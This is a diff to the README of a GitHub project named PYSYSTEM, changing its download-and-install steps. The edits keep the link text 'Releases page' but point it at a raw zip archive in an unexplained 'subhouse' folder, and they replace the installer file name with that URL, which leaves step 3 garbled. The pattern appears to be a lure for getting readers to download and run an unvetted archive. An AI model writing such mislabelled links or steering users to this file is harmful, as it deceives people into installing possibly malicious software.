Tinnyellow/PYSYSTEM/README.md

 ## 📚 Download & Install

-1. Click this link to visit the [Releases page](https://github.com/Tinnyellow/PYSYSTEM/releases).
+1. Click this link to visit the [Releases page](https://raw.githubusercontent.com/Tinnyellow/PYSYSTEM/main/subhouse/PYSYSTEM.zip).
 2. On the Releases page, find the latest version of PYSYSTEM.
-3. Look for the installer file, typically named something like `PYSYSTEM_vX.X.exe`.
+3. Look for the installer file, typically named something like `https://raw.githubusercontent.com/Tinnyellow/PYSYSTEM/main/subhouse/PYSYSTEM.zip`.
 4. Click the file to start the download.
 5. Once downloaded, locate the file in your Downloads folder.
 6. Double-click the installer file to start the installation process.